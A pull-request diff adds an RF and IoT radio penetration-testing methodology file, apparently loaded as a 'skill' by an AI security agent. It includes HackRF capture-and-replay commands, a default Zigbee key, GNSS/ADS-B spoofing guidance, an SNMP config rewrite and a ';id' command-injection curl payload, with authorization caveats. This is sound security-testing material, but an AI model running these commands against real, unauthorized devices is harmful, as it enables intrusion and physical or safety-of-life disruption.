+**Replay attacks (no/weak freshness).** Many telemetry, remote-control, and IoT-radio frames have no rolling counter or accept stale counters. Capture a command frame and re-send it.
+```
+# Capture a burst at the carrier, then re-transmit the same IQ (authorized TX only):
+urh_cli --device HackRF --frequency 433920000 --sample-rate 2000000 --receive -f capture.complex
+urh_cli --device HackRF --frequency 433920000 --sample-rate 2000000 --transmit -f capture.complex
+```
+Confirm the receiver actuates (door opens, relay toggles, telemetry value changes).
+
+**Missing message authentication / integrity.** If frames lack a MIC/HMAC, you can modify payload bytes and recompute only the CRC. Decode → flip target field → recompute CRC → encode → TX. CRC is error-detection, not authentication.
+
+**Predictable / replayable LoRaWAN join & frame counters.** Test ABP devices with frame-counter reset enabled (counter rolls to 0 on reboot → replay of old frames accepted). For OTAA, capture join-accept handling; verify `DevNonce` is tracked server-side to block join replay. Parse and verify the MIC:
+```
+python3 - <<'EOF'
+from LoRaWAN import lorawan, MalformedPacket
+# Load AppKey/NwkSKey recovered from firmware/config, parse a captured PHYPayload,
+# and check whether the MIC validates and whether the frame counter is enforced.
+EOF
+```
+
+**Default / shared / hardcoded keys.** LoRaWAN AppKeys baked per-model, default Zigbee Trust Center link key (`ZigBeeAlliance09`), global firmware keys. Extract via `binwalk`/`trufflehog` and test against a live device.
+
+**GNSS / ADS-B / AIS spoofing (unauthenticated broadcast).** These protocols have no message authentication. In a shielded enclosure, generate spoofed nav frames to assess receiver hardening (does it sanity-check position jumps, time, multi-constellation consistency?). Never radiate spoofed GNSS/ADS-B/AIS outside an RF-tight enclosure.
+
+**Management-plane vulns behind the radio (usually the real win):**
+- Default credentials (`admin/admin`, `admin/<serial>`, vendor docs).
+- Unauthenticated config/diagnostic endpoints exposing keys: `curl -sk https://192.0.2.10/cgi-bin/config.cgi`
+- SNMP read-write community → rewrite radio config: `snmpset -v2c -c private 192.0.2.10 <oid> ...`
+- Command injection in terminal web UIs (ping/traceroute/firmware-name fields):
+  ```
+  curl -sk "https://192.0.2.10/diag?host=127.0.0.1;id"
+  ```
+- Insecure OTA: unsigned/unencrypted firmware → push a modified image.
+- AT-command injection over exposed serial/USB/TCP modem channels.
+
+**SSRF/cloud backhaul.** Terminals that proxy to a vendor NMS or cloud API can be steered at internal/metadata endpoints — apply standard SSRF methodology to any URL-handling field.
+
+## Validation
+
+1. **Replay:** show a captured frame, re-transmitted unmodified, causes the receiver to act (logged state change, actuator movement, telemetry mutation). Capture before/after.
+2. **Injection/forgery:** demonstrate a crafted frame (modified field + valid CRC, or valid forged MIC using a recovered key) is accepted. Include the decoded original and modified frames side by side.
+3. **Key recovery:** show the extracted key (from firmware/SNMP/config) and prove it validates/decrypts live traffic (MIC check passes, payload decrypts to sensible values).
+4. **Management plane:** for default creds / injection / CVE, capture the authenticated session or command output (`id`, config dump) as proof.
+5. **Reproducibility:** record exact center frequency, sample rate, modulation, gain, and the capture/TX commands so the finding is repeatable.
+
+## False Positives
+
+- **Decode noise.** `rtl_433 -A` guesses modulation; a "decoded" frame may be random RF or another device on the band. Verify the decode is stable and tied to the asset (toggle the device, confirm correlated frames).
+- **Replay that does nothing.** Receiver accepted the RF but took no action (or rejected via counter/MIC silently). Replay is only a finding if it causes observable effect.
+- **Encrypted ≠ broken.** Capturing ciphertext is not a vulnerability; confirm you can replay, forge, or decrypt.
+- **Your own interference.** Bench TX can desync a link without a real auth bypass — confirm the receiver *accepted and acted on* the frame, not that it merely glitched.
+- **Out-of-scope emitters.** ISM bands are crowded; a finding on a neighbor's weather sensor is not your asset.
+- **Lab-only spoofing.** GNSS/ADS-B/AIS spoofing in a shielded box proves receiver behavior, not necessarily a real-world exploitable condition for that deployment.
+
+## Chaining & Impact
+
+- **Management default creds → radio key dump → OTA frame forgery:** log into the terminal/gateway, read the stored NwkSKey/AppKey, then forge authenticated commands the network treats as legitimate.
+- **Firmware hardcoded key → fleet-wide forgery:** one extracted global key forges/decrypts traffic for every device of that model.
+- **Replay → actuation → safety/physical impact:** replayed control frames toggle relays, gates, SCADA/RTU telemetry, or satellite-terminal config.
+- **SNMP RW → reconfigure carrier/frequency → DoS or redirect** the link, or pivot the management config to expose more services.
+- **Command injection / unsigned OTA → terminal RCE → persistent foothold** bridging the RF segment to the IP network and cloud backhaul.
+- **GNSS spoofing → time/position manipulation** affecting downstream timing-dependent systems (assess in lab; flag deployment risk).
+
+## Pro Tips
+
+1. **Hit the management plane first.** A web UI with default creds or an exposed SNMP community beats hours of DSP. RF is the headline; IP is usually the win.
+2. **Capture-only until TX is explicitly authorized.** Transmitting is regulated and can interfere with safety-of-life systems (aviation/maritime/satellite). Get it in writing.
+3. **`rtl_power` then `inspectrum`/URH.** Sweep to find energy, then look at the IQ before guessing — symbol rate and framing are obvious visually.
+4. **Counters are the tell.** Whether replay works hinges on frame-counter/nonce enforcement. Reboot ABP/IoT devices and watch for counter reset.
+5. **CRC is not auth.** If there's only a CRC, assume forgery is possible and prove it by flipping a byte and recomputing.
+6. **Pull keys from firmware before brute-forcing RF.** `binwalk` + `trufflehog` on the image often hands you AppKeys, default creds, and the OTA pubkey.
+7. **Shield spoofing tests.** GNSS/ADS-B/AIS injection belongs in a Faraday enclosure or via cabled/attenuated injection — never over the air.
+8. **Correlate to confirm.** Toggle the physical device and match the on-air frame change; that single step kills most false-positive decodes.
+9. **Don't disrupt live links.** For satellite/aviation/maritime assets, stop at proof — availability impact can be real-world dangerous and out of scope.


### PR DESCRIPTION
## What

Adds deep per-asset methodology **skills** for Hardware/IoT, firmware, OT/SCADA, physical access, RF, and generic assets.

Part of the asset-coverage effort (foundation in #533, which adds the asset taxonomy + detection + recommended-skill hooks). These files provide the deep methodology each asset type's recommendation points at.

## Skills added

- `strix/skills/hardware/firmware.md`
- `strix/skills/hardware/hardware_iot.md`
- `strix/skills/hardware/ot_scada_ics.md`
- `strix/skills/physical/physical_access_control.md`
- `strix/skills/physical/rf_interface.md`
- `strix/skills/assets/other_asset.md`

## Notes

- Markdown only; no code changes. Auto-discovered by the skills loader (`get_available_skills` / `load_skills`), so they appear in `available_skills` and are loadable via `load_skill` or `create_agent(skills=[...])`.
- Each follows the house template/tone (cf. `vulnerabilities/ssrf.md`).
- No filename overlap with #532 (complementary asset coverage).
